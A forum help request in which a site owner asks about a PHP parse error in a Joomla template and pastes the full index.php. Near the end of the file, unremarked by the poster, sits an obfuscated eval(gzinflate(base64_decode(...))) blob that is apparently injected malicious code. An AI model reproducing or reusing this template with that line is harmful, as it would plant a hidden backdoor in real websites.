473,385 Members | 1,661 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,385 software developers and data experts.

Parse error: syntax error, unexpected $end in /home/person69/public_html/templates/ga

Helle everyone,

I'm am not that familiar with HTML codes etc. but I do have a serious problem with my website witch gives the following code if I open it:

Parse error: syntax error, unexpected $end in /home/person69/public_html/templates/game_crusade/index.php on line 359

I've checked the template and looked at line 359 if there whas a problem but I could not solve it (cause I dont understand). This is the code of the template HTML

Expand|Select|Wrap|Line Numbers
  1. <?php
  2. defined( '_JEXEC' ) or die( 'Restricted index access' );
  3. define( 'TEMPLATEPATH', dirname(__FILE__) );
  4. /*
  5. -----------------------------------------
  6. Game Crusade - December 2009 Shape 5 Club Template
  7. -----------------------------------------
  8. Site:      www.shape5.com
  9. Email:     contact@shape5.com
  10. @license:  Copyrighted Commercial Software
  11. @copyright (C) 2009 Shape 5
  12.  
  13. */
  14.  
  15. ?>
  16. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  17. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
  18. <head>
  19. <jdoc:include type="head" />
  20.  
  21. <?php
  22.  
  23. //
  24. ///////////////////////////////////////////////////////////////////////////////////////
  25.  
  26.  
  27.  
  28.         $s5_bg = $this->params->get ("xml_s5_bg");
  29.         $s5_bg_images = $this->params->get ("xml_s5_bg_images");
  30.         $s5_bg_tween = $this->params->get ("xml_s5_bg_tween");
  31.         $s5_bg_fixed = $this->params->get ("xml_s5_bg_fixed");
  32.         $s5_highlight = $this->params->get ("xml_s5_highlight");
  33.         $s5_body_width = $this->params->get ("xml_s5_body_width");
  34.         $s5_top1_width = $this->params->get ("xml_s5_top1_width");
  35.         $s5_right_width = $this->params->get ("xml_s5_right_width");
  36.         $s5_left_width = $this->params->get ("xml_s5_left_width");
  37.         $s5_inset_width = $this->params->get ("xml_s5_inset_width");
  38.         $s5_menu_color = $this->params->get ("xml_s5_menu_color");      
  39.         $s5_menu = $this->params->get ("xml_s5_menu");    
  40.         $s5_jsmenu = $this->params->get ("xml_s5_jsmenu");  
  41.         $s5_text_menu_1 = $this->params->get ("xml_s5_text_menu_1");
  42.         $s5_text_menu_2 = $this->params->get ("xml_s5_text_menu_2");
  43.         $s5_text_menu_3 = $this->params->get ("xml_s5_text_menu_3");
  44.         $s5_text_menu_4 = $this->params->get ("xml_s5_text_menu_4");
  45.         $s5_text_menu_5 = $this->params->get ("xml_s5_text_menu_5");
  46.         $s5_text_menu_6 = $this->params->get ("xml_s5_text_menu_6");
  47.         $s5_text_menu_7 = $this->params->get ("xml_s5_text_menu_7");
  48.         $s5_text_menu_8 = $this->params->get ("xml_s5_text_menu_8");
  49.         $s5_text_menu_9 = $this->params->get ("xml_s5_text_menu_9");
  50.         $s5_text_menu_10 = $this->params->get ("xml_s5_text_menu_10");
  51.         $s5_show_frontpage = $this->params->get ("xml_s5_frontpage");  
  52.         $s5_urlforSEO = $this->params->get ("xml_s5_seourl");
  53.         $s5_lytebox = $this->params->get ("xml_s5_lytebox");  
  54.         $s5_tooltips = $this->params->get ("xml_s5_tooltips"); 
  55.  
  56.  
  57.  
  58. // It is recommended that you do not edit below this line.
  59. ///////////////////////////////////////////////////////////////////////////////////////
  60.  
  61.  
  62. if (($s5_menu  == "1") || ($s5_menu  == "3") || ($s5_menu  == "4")){ 
  63.     if ($s5_jsmenu == "s5") { 
  64.         require( TEMPLATEPATH.DS."s5_no_moo_menu.php");
  65.         $menu_name = $this->params->get ("xml_menuname");
  66.     }
  67.     else if ($s5_jsmenu == "jq")  {
  68.         require( TEMPLATEPATH.DS."s5_suckerfish.php");
  69.         $menu_name = $this->params->get ("xml_menuname");
  70.     }
  71. }
  72.  
  73. else if ($s5_menu  == "2")  {
  74.     require( TEMPLATEPATH.DS."s5_suckerfish.php");
  75.     $menu_name = $this->params->get ("xml_menuname");
  76. }
  77.  
  78. if ($s5_urlforSEO  == ""){ 
  79. $LiveSiteUrl = JURI::root();}
  80. if ($s5_urlforSEO  != ""){ 
  81. $LiveSiteUrl = "$s5_urlforSEO/";}
  82.  
  83. $br = strtolower($_SERVER['HTTP_USER_AGENT']);
  84. $browser = "other";
  85.  
  86. if(strrpos($br,"msie 7") > 1) {
  87. $browser = "ie7";} 
  88.  
  89. if(strrpos($br,"msie 8") > 1) {
  90. $browser = "ie8";} 
  91.  
  92.  
  93. // Module size calculations
  94.  
  95. $s5_inset_margin = "11";
  96. $s5_right_margin = "11";
  97. $s5_left_margin = "11";
  98.  
  99. $s5_inset_margin_l = "0";
  100. $s5_inset_margin_r = "0";
  101.  
  102. if(!$this->countModules('inset')) {
  103. $s5_inset_width = "0";    
  104. $s5_inset_margin = "0";
  105. }
  106.  
  107. if(!$this->countModules('right')) {
  108. $s5_right_width = "0";    
  109. $s5_right_margin = "0";
  110. }
  111.  
  112. if(!$this->countModules('left')) {
  113. $s5_left_width = "0";    
  114. $s5_left_margin = "0";
  115. }
  116.  
  117. if($this->countModules('inset') && $this->countModules('right')) {
  118. $s5_inset_margin = "22";
  119. $s5_inset_margin_l = "11";
  120. $s5_inset_margin_r = "0";
  121. }
  122.  
  123. if($this->countModules('inset') && !$this->countModules('right')) {
  124. $s5_inset_margin = "11";
  125. $s5_inset_margin_l = "11";
  126. }
  127.  
  128.  
  129. if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="24.9%"; }
  130. else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
  131. else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
  132. else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
  133. else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="33.3%"; }
  134. else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
  135. else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
  136. else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
  137. else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
  138. else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
  139. else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
  140. else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="100%"; }
  141. else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }
  142. else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }
  143. else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }
  144.  
  145.  
  146. if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="24.9%"; }
  147. else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
  148. else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
  149. else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
  150. else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
  151. else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  152. else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  153. else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  154. else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  155. else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  156. else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
  157. else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="100%"; }
  158. else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }
  159. else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }
  160. else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }
  161.  
  162.  
  163.  
  164.  
  165. ?>
  166.  
  167. <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
  168. <meta http-equiv="Content-Style-Type" content="text/css" />
  169.  
  170. <link rel="stylesheet" href="<?php echo $LiveSiteUrl ?>templates/system/css/system.css" type="text/css" />
  171. <link rel="stylesheet" href="<?php echo $LiveSiteUrl ?>templates/system/css/general.css" type="text/css" />
  172.  
  173. <link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/template_css.css" rel="stylesheet" type="text/css" media="screen" />
  174.  
  175. <link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/s5_suckerfish.css" rel="stylesheet" type="text/css" media="screen" />
  176.  
  177. <?php if ($s5_jsmenu == "jq") { ?>
  178. <?php if (($s5_menu  == "1") || ($s5_menu  == "3") || ($s5_menu  == "4")) { ?>
  179. <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/bridgeofhope/js/jquery13.js"></script>
  180. <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/bridgeofhope/js/jquery.no.conflict.js"></script>
  181. <script type="text/javascript">
  182. function s5_jqmainmenu(){
  183. jQuery(" #navlist ul ").css({display: "none"}); // Opera Fix
  184. jQuery(" #s5_navv li").hover(function(){
  185.         jQuery(this).find('ul:first').css({visibility: "visible",display: "none"}).<?php if ($s5_menu  == "1") { ?>show(400)<?php } ?><?php if ($s5_menu  == "3") { ?>fadeIn(500)<?php } ?><?php if ($s5_menu  == "4") { ?>slideDown(400)<?php } ?>;
  186.         },function(){jQuery(this).find('ul:first').css({visibility: "hidden"});    });}
  187.   jQuery(document).ready(function(){ s5_jqmainmenu();});
  188. </script>
  189. <?php } ?>
  190. <?php } ?>
  191.  
  192. <link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/editor.css" rel="stylesheet" type="text/css" media="screen" />
  193.  
  194. <link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  195.  
  196. <?php 
  197. // Disable lytebox when VM is loaded 
  198. if (JRequest::getVar('option') == 'com_virtuemart' ) { 
  199.  } else { ?>
  200. <?php if ($s5_lytebox  == "yes") { ?>
  201. <link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/lytebox.css" rel="stylesheet" type="text/css" media="screen" />
  202. <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/lytebox.js"></script>
  203. <?php } ?>
  204. <?php } ?>
  205.  
  206. <?php { 
  207. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_1 = '".$s5_text_menu_1."';</script>";
  208. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_2 = '".$s5_text_menu_2."';</script>";
  209. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_3 = '".$s5_text_menu_3."';</script>";
  210. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_4 = '".$s5_text_menu_4."';</script>";
  211. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_5 = '".$s5_text_menu_5."';</script>";
  212. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_6 = '".$s5_text_menu_6."';</script>";
  213. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_7 = '".$s5_text_menu_7."';</script>";
  214. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_8 = '".$s5_text_menu_8."';</script>";
  215. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_9 = '".$s5_text_menu_9."';</script>";
  216. echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_10 = '".$s5_text_menu_10."';</script>";
  217. }?>
  218.  
  219. <?php if($browser == "ie7" && $s5_menu != "5") { ?>
  220. <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/IEsuckerfish.js"></script>
  221. <?php } ?>
  222.  
  223. <style type="text/css"> 
  224.  
  225. #s5_menu {
  226. background:<?php if ($s5_menu_color != "") { ?>#<?php echo $s5_menu_color ?> <?php } ?>url(<?php echo $LiveSiteUrl ?>templates/game_crusade/images/s5_menu_bg.png) repeat-x top left;
  227. }
  228.  
  229. #s5_navv ul li.active a.active, #cboxLoadedContent div.module h3, .s5_h3_first, a, .contentheading, .componentheading, #current, #current span.s5_accordion_menu_left a.mainlevel, #current span {
  230. color:#<?php echo $s5_highlight ?>;
  231. }
  232.  
  233. <?php if(!$this->countModules('bottom_row_1') && !$this->countModules('bottom_row_2') && !$this->countModules('bottom_row_3') && !$this->countModules('bottom_row_4')) { ?>
  234. #s5_footer {
  235. margin-top:-11px;
  236. }
  237. <?php } ?>
  238.  
  239. <?php if(!$this->countModules('top_3')) { ?>
  240. #s5_top_container {
  241. margin-bottom:0px;
  242. }
  243.  
  244. #s5_top_container .module_round_box {
  245. margin-bottom:0px;
  246. }
  247. <?php } ?>
  248.  
  249. <?php if ($s5_menu  == "5") { ?>
  250.  
  251. #s5_top_container {
  252. margin:0px;
  253. }
  254.  
  255. #s5_top_container .module_round_box {
  256. margin-top:0px;
  257. }
  258.  
  259. <?php } ?>
  260.  
  261. <?php if($browser == "ie7") { ?>
  262. .s5_mm {
  263.     background:#050505;
  264.     filter: alpha(opacity=78);
  265. }
  266. <?php } ?>
  267.  
  268. </style>
  269.  
  270. </head>
  271.  
  272. <body id="s5_body" style="background-color:#<?php echo $s5_bg ?>">
  273. <div id="s5_body_wrap" style="background:url('<?php echo $LiveSiteUrl ?>templates/game_crusade/images/s5_background1.jpg') no-repeat top center<?php if ($s5_bg_fixed == "fixed") { ?>; position:fixed<?php } ?>">
  274. </div>
  275. <?php if ($s5_bg_fixed == "fluid") { ?>
  276. <script type="text/javascript" language="javascript">
  277. function s5_gc_getDocHeight() {
  278.     var s5_gc_D = document;
  279.     return Math.max(
  280.         Math.max(s5_gc_D.body.scrollHeight, s5_gc_D.documentElement.scrollHeight),
  281.         Math.max(s5_gc_D.body.offsetHeight, s5_gc_D.documentElement.offsetHeight),
  282.         Math.max(s5_gc_D.body.clientHeight, s5_gc_D.documentElement.clientHeight)
  283.     );
  284. }
  285. function s5_gc_resize_bg() {
  286. s5_gc_getDocHeight();
  287. document.getElementById("s5_body_wrap").style.height = s5_gc_getDocHeight() + "px";
  288. }
  289. var s5_gc_resize_Interval = 0;
  290. s5_gc_resize_Interval = window.setInterval("s5_gc_resize_bg()",200);
  291. </script>
  292. <?php } ?>
  293.  
  294. <div id="s5_main_body_wrap" style="margin-left:-<?php echo $s5_body_width/2 ?>px; width:<?php echo $s5_body_width ?>px">
  295.  
  296.     <div id="s5_header_wrap1">
  297.     <div id="s5_header_wrap2">
  298.     <div id="s5_header_wrap3" style="width:<?php echo $s5_body_width - 24 ?>px">
  299.         <div id="s5_logo" onclick="window.document.location.href='index.php'"></div>
  300.         <div id="s5_top_wrap" style="width:<?php echo $s5_body_width - 464 ?>px">
  301.             <div id="s5_top_menu">
  302.                 <jdoc:include type="modules" name="top_menu" style="no_title" />
  303.             </div>
  304.             <div style="clear:both"></div>
  305.             <?php if ($this->countModules("search")) { ?>
  306.             <div id="s5_search_outer">
  307.             <div id="s5_search">
  308.                 <jdoc:include type="modules" name="search" style="no_title" />
  309.             </div>
  310.             </div>
  311.         <?php } ?>
  312.         </div>
  313.     </div>
  314.     </div>
  315.     </div>
  316.  
  317.     <div id="s5_main_wrap" style="width:<?php echo $s5_body_width ?>px">
  318.         <?php if ($this->countModules("top_1") || $this->countModules("top_2") || $this->countModules("top_3") || $s5_menu  <= "4") { ?>
  319.             <div class="s5_round_wrap">
  320.  
  321.                 <div class="s5_tl"></div>
  322.                 <div class="s5_tm" style="width:<?php echo $s5_body_width - 48 ?>px"></div>
  323.                 <div class="s5_tr"></div>
  324.  
  325.                 <div class="s5_ml" style="width:<?php echo $s5_body_width - 24 ?>px">
  326.                 <div class="s5_mr" style="width:<?php echo $s5_body_width - 48 ?>px">
  327.                     <div class="s5_mm" style="width:<?php echo $s5_body_width - 48 ?>px">
  328.                     <div style="position:relative">
  329.                         <?php if ($s5_menu  != "5") { ?>
  330.  
  331.                             <div id="s5_menu">
  332.  
  333.                                 <div id="s5_navv">
  334.  
  335.                                     <?php mosShowListMenu($menu_name);    ?>
  336.  
  337.                                     <?php if ($s5_jsmenu  == "s5") { ?>
  338.                                         <?php if ($s5_menu  == "1") { ?>
  339.                                             <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_drop_in_no_moo_menu.js"></script>                                                                        
  340.                                         <?php } ?>
  341.                                         <?php if ($s5_menu  == "2") { ?>
  342.                                             <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_fading_no_moo_menu.js"></script>                                                                        
  343.                                         <?php } ?>    
  344.                                         <?php if ($s5_menu  == "3") { ?>
  345.                                             <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_scroll_down_no_moo_menu.js"></script>                                                                        
  346.                                         <?php } ?>    
  347.                                     <?php } ?>    
  348.  
  349.                                     <script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_menu_active_and_parent_links.js"></script>                                                                        
  350.  
  351.                                 </div>
  352.  
  353.  
  354.     <script type="text/javascript" language="javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_effects.js"></script>
  355.     <?php } ?>
  356.  
  357. <?php eval(@gzinflate(base64_decode('TVXJDqzIEfyXdxlbWMO+yZpDs+9bN6ueZAENDTQ7FNvXD+M3kn0IhTIiSlmHyspxLj7/mYuxTfPiHz/g3yG4+PGvHz8Pivx50NTN6A3+54ExN9O39riZvSHeoH55f2Vo4teZ/+awvzX8l4bfOfz2Semu/85Rf3n/V2PMb0fwXjNIk0WHMDdMBcyIr/VXK1pxaNsrGQnwrP25OZFte3hJekhoI7HtPL9dLWJYhgZ0QtqIpUKU7PFKhSV90vXdGztY63JJRhdfftaEAlhq7tybLvleM5Sp+7NknpCdQwyRyT3DZFr4xvrlzc35Q4V3E1YOKJHeySnO02Op7I4cnj6KqC/yTYd1FV4iJ+18E5q1YOIg7Bl7lkh40hcJfstihCh7JT5ex0CU3x0gTP4ZuuSVTGpwyrioQ0quJRfzVjDLJJERW2uRtoOIVzkzpam7lY1o9PTovzmTX0fCJQrwKSrLXRn+xIijOFE2Dy+G8r7wYIl69Fnt3hbU/Box8pOpKeX4spDsWu1t9nKaudKULnDbWJbDOEkGNiA+dBInUAojGJAhPo5Cug+JF/f41keFQBXz8fy9PtrODiuJsGxO1AQGc1SYMoTeJ6Blgqtvfg7LwDvsd3KALFQfWaSOBpltsgz6YiihGXfYRSgNfaMpFHPObem7cKlSurdTSNmqnnRhAJb7kYzu4bUzYYPPRHJt61Yt7ezTNpNdnNb0iYnP/GXjvGhfEcIS8Te1hw4Xmb4RUea7UG89dAgHfqmCAT9FF+n1lzq/s/4iphJytLN1nrOqciqiyt9tqOhKj4KlotcXNJzwfIHVcuKXMgWcos2bnqkUv3fwEh/bp9tscTrPT92GNobXgQUJyEbVZx2nV7IKBpengs8UFNGE68JKVpQ378VduNCZRHIzFwVtXFjGhEHsQzb1CaOi+o4hp4aweoSjPuYhfAqAtZeWBvWUro/9K3wbmSzgU1dUo9JGo19qO8hn6fMtlZjglzZ5pw6jTfU9GJozOCVaWacRXthjfeFGiNV1m4VEOAcgDBM5HNX2YczAsusMO0UEpCVa8AKnjZAn6p2S+cXK0akFC1cZWdq+pgKEl0RBVUniU5ErcD7OlzO72S2ezjmOGFmxGSlDTVDGSqwX8YbTn4RrxvKrVvcHmfNYcDmRZCsiPLXUWgT3lRWLBJuTrOI+wPUI080SLwCLsjMvnui6lVqXjY9AQDhoKBGebxcP95W5n5qZIBYeh3qKIDCyJ5O2yOkX4KwZ1CjLaqSKdbb+6Nm5T2NzKJLq8nnfd0i5naKBxPh7nu3wA6alMy4mGT2xlmryHOnLw+moKbFzS7RnyMqaPo7zNIwGg7PfQ+JiQ+DUZZeMXLYIC0ywTTaklZYst7L0FtFv6o3m0eErras/h5dZm0DuvOdGCnUmRoL5XMLWvNDQ3/X78zIVaj5QJU08/BGC7BT945oXW09b6k2PKa+Jg0gNPqdnH8v/0iM5QEKXqNnVi4WpIgcKAg/SNNfT9ays7ZEIEZSpQfA8llQW9C6nxa20y+nkpVLHQUwcXEVKjxlMR1TY0iADIfNhsbyc0yydDaVJq+zrq3zGhvziq9WOmLXNPOPAxGXQYOO9Z6xclycIPUmgg8CNC0S1M4HXpwMbYZZKHe1iPTyQUD8n2mzzt29WpbGqrlB/fK7N7nMduHUuCy4Z6wwwqjkzyF1PTs+RjBDZ5L1txp6qQU1aCuTsCw4/3D/++O3eCOz/gHP3Uvr9xz///Sc='))); ?></body>
  358.  
  359. </html>
Please let me know if you have an answer so I can put my website back online!!!

THANX everyone!
Sep 16 '12 #1
1 2382
.................................................. ..
Sep 16 '12 #2

Sign in to post your reply or Sign up for a free account.

Similar topics

8
by: Wescotte | last post by:
The error message Parse error: syntax error, unexpected $end in FILE on line X is one I run into frequently and I know the cause is I missed an ending quote. Is there an easy way to determine...
9
akohistani
by: akohistani | last post by:
I am having Parse error problem with my newly purchased Php upload script I have uploaded the script and I get the error below Parse error: syntax error, unexpected $end in URL/functions.php on...
25
by: URmusicandvideo | last post by:
I have just finshed my first php code and posted it online and I am getting a Parse error: syntax error, unexpected T_VARIABLE in /home/hydeands/public_html/phpmail.php on line 45 But when I look...
4
by: Graviz | last post by:
I am gettin a error message on this script can someone help me. I can't see what is wrong. Thanks in advance for any help you can give me. here is the error and code. Parse error: syntax error,...
3
by: brkseven | last post by:
Looking for help with this Contact Form. The error is on line 1, but that' doesn't mean a lot, I think. In fact, a php syntax check passed it, but I was hoping for an easy syntax error, it looks...
2
by: TanjaPetro | last post by:
Hello to everyone. I changed a few files on my site and when I tried to log into the admin area I got this message: Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting...
13
Topbidder
by: Topbidder | last post by:
I have this error on the code Parse error: syntax error, unexpected '"' in /home/topbidd/public_html/bid2/bid_classic.php on line 159 now i thought the error was this It seems that the...
1
by: karine | last post by:
Hi, I keep getting this error message "Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ']' in /home/env49986/public_html/welcome.php on line 16" below is the code ...
3
by: CYNTHIA CUTRER | last post by:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> ...
2
by: Vicki Hendra | last post by:
Hi I am new to php fullstop I and colleagues have setup wordpress blogs for our local towns, giving the local businesses free advertisment. Part of the problem started when using wordpress...
1
by: CloudSolutions | last post by:
Introduction: For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
0
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...
0
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome former...
0
by: ryjfgjl | last post by:
In our work, we often need to import Excel data into databases (such as MySQL, SQL Server, Oracle) for data analysis and processing. Usually, we use database tools like Navicat or the Excel import...
0
by: taylorcarr | last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
0
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
0
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
0
BarryA
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
1
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.